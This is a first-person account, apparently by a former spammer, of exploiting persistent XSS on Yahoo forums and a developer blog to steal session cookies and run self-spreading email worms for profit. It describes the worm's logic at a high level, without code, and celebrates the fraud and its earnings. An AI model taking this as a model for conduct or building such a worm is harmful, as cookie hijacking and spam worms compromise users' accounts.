The first time I remember reading about XSS was when the Samy worm was created on MySpace in 2005. In fact, I had actually used different XSS techniques to bypass MySpace’s filters during my operation.
Anyways, the first time I saw a Yahoo XSS was on another spammer’s landing page that was promoting a work from home program. My friend owned the program he was pushing and wanted me to check out his landing page and see how he was making $5,000/day. After investigating it for a few minutes, I saw that there was a bit of code loading from the domain yahoo.com. This was unusual, because there wasn’t any reason why any assets from yahoo.com should be loading. I captured the headers and saw that it linked back to hk.groups.yahoo.com or something similar. There was a forum on the page that was vulnerable to a persistent XSS attack. He was stealing yahoo user’s cookie sessions and mailing with them.
After understanding the intricacies of this operation I wasn’t too surprised that he was clearing $5,000/day. Within the hour, I found the injection point and had injected my own code into the vulnerable Yahoo forum. Now when you steal a user’s session cookie it means that you don’t need their login credentials, no email, no password, nothing. You were already logged into their account by having their cookie. The worm was fairly simple, you grab the users cookie, hit mail.yahoo.com, and send mail to everyone in their address book. Once users read the email and visited the website that was sent in the email, it would grab their cookie and go through the process all over again. Yahoo killed the website that was vulnerable in just a couple of days, but not before making close to $30,000.
For me, hacking and spamming is a high that can’t be replicated. Over the next year, I would go on to find more XSS exploits, once again playing cat and mouse with Yahoo’s security team. The most infamous XSS exploit that I found was on the Yahoo developer’s blog. It was a publicly known exploit, but for me it was a chance to slap Yahoo in the face. Now I didn’t necessarily have a grudge against Yahoo, but at the time they were offering security researchers $12.50 voucher to their store for these same exploits that put every user on Yahoo at risk.
On this particular XSS vulnerability and worm, I hacked over 5 million accounts and sent over 25 million emails in a 3 day period. At the peak of this worm I was making $1,000 every 10 minutes. I was promoting a work from home program that paid $100 per sign up and I accumulated over 2,500 sales, do the math on that one. This caused havoc for yahoo and eventually led them to change the way they stored cookies.
Here’s a couple of articles detailing the exploits: